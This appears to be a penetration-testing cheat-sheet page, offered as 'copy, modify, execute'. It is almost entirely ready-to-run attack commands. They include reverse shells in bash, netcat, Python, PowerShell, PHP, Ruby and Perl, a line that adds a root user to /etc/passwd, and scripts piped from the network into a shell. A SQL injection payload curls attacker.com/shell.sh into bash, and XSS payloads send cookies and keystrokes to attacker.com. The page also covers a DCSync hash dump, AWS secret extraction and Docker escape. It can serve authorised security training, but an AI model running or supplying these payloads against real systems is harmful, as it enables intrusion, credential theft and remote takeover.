Reverse Shells Linux
Bash Reverse Shell
Standard bash reverse shell using /dev/tcp
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1📋 Cheat Sheets
Quick reference for common attacks and techniques. Copy, modify, execute. Updated for 2025.
Reverse Shells Linux
Netcat Reverse Shell
Classic netcat reverse shell (requires nc -e support)
nc -e /bin/bash 10.0.0.1 4444 Reverse Shells Linux
Netcat Reverse Shell (No -e)
Netcat reverse shell without -e flag using named pipes
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 4444 >/tmp/f Reverse Shells Linux
Python Reverse Shell
Python reverse shell with PTY
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' Reverse Shells Windows
PowerShell Reverse Shell
PowerShell TCP reverse shell
$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Reverse Shells Linux
PHP Reverse Shell
PHP one-liner reverse shell
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");' Reverse Shells Linux
Ruby Reverse Shell
Ruby one-liner reverse shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Reverse Shells Linux
Perl Reverse Shell
Perl reverse shell one-liner
perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Linux Privilege Escalation Linux
SUID Binary Search
Find all SUID binaries for privilege escalation
find / -perm -4000 -type f 2>/dev/null Linux Privilege Escalation Linux
Writable /etc/passwd
Add new root user if /etc/passwd is writable
echo 'root2:$(openssl passwd -1 -salt hack password123):0:0:root:/root:/bin/bash' >> /etc/passwd && su root2 Linux Privilege Escalation Linux
Sudo Version Check
Check sudo version for CVE-2021-3156 (Baron Samedit) and other exploits
sudo -V | grep 'Sudo version' Linux Privilege Escalation Linux
Capabilities Enumeration
Find files with special capabilities set
getcap -r / 2>/dev/null Linux Privilege Escalation Linux
Cron Job Enumeration
Enumerate cron jobs for privilege escalation opportunities
cat /etc/crontab && ls -la /etc/cron.* && crontab -l && sudo crontab -l Linux Privilege Escalation Linux
Kernel Version Check
Check kernel version for known exploits
uname -a && cat /proc/version && cat /etc/issue Linux Privilege Escalation Linux
LinPEAS Quick Scan
Run LinPEAS automated privilege escalation scanner
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh Windows Privilege Escalation Windows
Check User Privileges
Display current user privileges and tokens
whoami /priv Windows Privilege Escalation Windows
Unquoted Service Path Search
Find services with unquoted paths for privilege escalation
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v """" Windows Privilege Escalation Windows
AlwaysInstallElevated Check
Check if AlwaysInstallElevated is enabled for MSI privilege escalation
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated && reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated Windows Privilege Escalation Windows
Stored Credentials Search
List stored credentials that can be used with runas
cmdkey /list Windows Privilege Escalation Windows
PowerUp Privilege Check
Run PowerUp to find Windows privilege escalation vectors
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks" Windows Privilege Escalation Windows
Windows Exploit Suggester
Get system info for Windows Exploit Suggester (run locally)
systeminfo > systeminfo.txt SQL Injection Web
Union-Based SQLi Payload
Basic union-based SQL injection payload (adjust column count)
' UNION SELECT NULL,NULL,NULL-- - SQL Injection Web
Error-Based SQLi (MySQL)
MySQL error-based SQL injection to extract version
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)y)-- - SQL Injection Web
Boolean-Based Blind SQLi
Boolean-based blind SQL injection true condition
' AND 1=1-- - SQL Injection Web
Time-Based Blind SQLi (MySQL)
Time-based blind SQL injection using SLEEP
' AND SLEEP(5)-- - SQL Injection Web
SQLi Authentication Bypass
Classic SQL injection authentication bypass
admin' OR '1'='1'-- - SQL Injection Web
PostgreSQL RCE via SQLi
PostgreSQL command execution via COPY TO PROGRAM
'; COPY (SELECT '') TO PROGRAM 'curl http://attacker.com/shell.sh | bash'-- - XSS Web
Basic XSS Alert
Basic XSS payload for testing
<script>alert(document.domain)</script> XSS Web
XSS Cookie Stealer
Steal cookies via XSS
<script>fetch('https://attacker.com/'+document.cookie)</script> XSS Web
XSS Keylogger
Simple keylogger via XSS
<script>document.onkeypress=function(e){fetch('https://attacker.com/'+e.key)}</script> XSS Web
XSS with SVG
XSS using SVG tag with onload event
<svg onload=alert(1)> XSS Web
XSS IMG Tag
XSS via img tag error event
<img src=x onerror=alert(1)> Password Cracking Linux
Hashcat MD5 Crack
Crack MD5 hashes with rockyou wordlist
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt Password Cracking Linux
Hashcat NTLM Crack
Crack NTLM hashes (Windows passwords)
hashcat -m 1000 -a 0 ntlm.txt /usr/share/wordlists/rockyou.txt Password Cracking Linux
John the Ripper Basic
Basic John the Ripper password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Password Cracking Linux
John ZIP Password
Crack ZIP file password
zip2john file.zip > hash.txt && john hash.txt Password Cracking Linux
Hashcat Rule-Based Attack
Rule-based password cracking with best64 rules
hashcat -m 0 -a 0 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule File Transfer Linux
Python HTTP Server
Quick HTTP server for file transfers
python3 -m http.server 8000 File Transfer Linux
Download with cURL
Download file using cURL
curl http://10.0.0.1:8000/file.txt -o file.txt File Transfer Linux
Download with Wget
Download file using wget
wget http://10.0.0.1:8000/file.txt File Transfer Windows
PowerShell Download
Download file using PowerShell
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.0.0.1:8000/file.exe','file.exe')" File Transfer Windows
Certutil Download
Download file using certutil (built-in Windows tool)
certutil -urlcache -f http://10.0.0.1:8000/file.exe file.exe File Transfer Linux
Base64 File Transfer
Encode file in base64 for copy/paste transfer
base64 -w 0 file.txt File Transfer Linux
Netcat File Transfer (Sender)
Send file via netcat
nc -lvnp 4444 < file.txt File Transfer Linux
Netcat File Transfer (Receiver)
Receive file via netcat
nc 10.0.0.1 4444 > file.txt Port Scanning Linux
Nmap TCP SYN Scan
Fast TCP SYN scan of all ports
nmap -sS -p- -T4 10.0.0.1 Port Scanning Linux
Nmap Service Version Detection
Service version detection with default scripts
nmap -sV -sC -p- 10.0.0.1 Port Scanning Linux
Nmap UDP Scan
UDP scan of top 100 ports
nmap -sU --top-ports 100 10.0.0.1 Port Scanning Linux
Nmap Stealth Scan
Stealth scan with fragmentation and decoys
nmap -sS -f -D RND:10 10.0.0.1 Active Directory Windows
Kerberoasting
Kerberoast service accounts (PowerView)
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat Active Directory Windows
AS-REP Roasting
Find users with pre-auth not required for AS-REP roasting
Get-DomainUser -PreauthNotRequired | Select samaccountname Active Directory Windows
BloodHound Data Collection
Collect AD data for BloodHound analysis
SharpHound.exe -c All --outputdirectory C:\temp Active Directory Windows
DCSync Attack
Dump password hashes via DCSync
mimikatz # lsadump::dcsync /domain:example.com /user:Administrator Active Directory Windows
Domain Enumeration
Enumerate domain trusts
nltest /domain_trusts /all_trusts Cloud - AWS Cloud
AWS S3 Bucket List
List contents of public S3 bucket
aws s3 ls s3://bucket-name --no-sign-request Cloud - AWS Cloud
AWS IAM User Enumeration
List IAM users in AWS account
aws iam list-users Cloud - AWS Cloud
AWS EC2 Instance Enumeration
List EC2 instances in region
aws ec2 describe-instances --region us-east-1 Cloud - AWS Cloud
AWS Secrets Manager Dump
Enumerate and extract AWS secrets
aws secretsmanager list-secrets && aws secretsmanager get-secret-value --secret-id <secret-name> Cloud - Azure Cloud
Azure AD User Enumeration
List Azure AD users
az ad user list --query "[].userPrincipalName" Cloud - Azure Cloud
Azure Storage Account Enumeration
List storage accounts
az storage account list Container Escape Linux
Docker Socket Escape
Escape Docker container if docker.sock is mounted
docker run -it --rm -v /:/host ubuntu chroot /host Container Escape Linux
Check for Privileged Container
Check container capabilities for escape opportunities
cat /proc/self/status | grep CapEff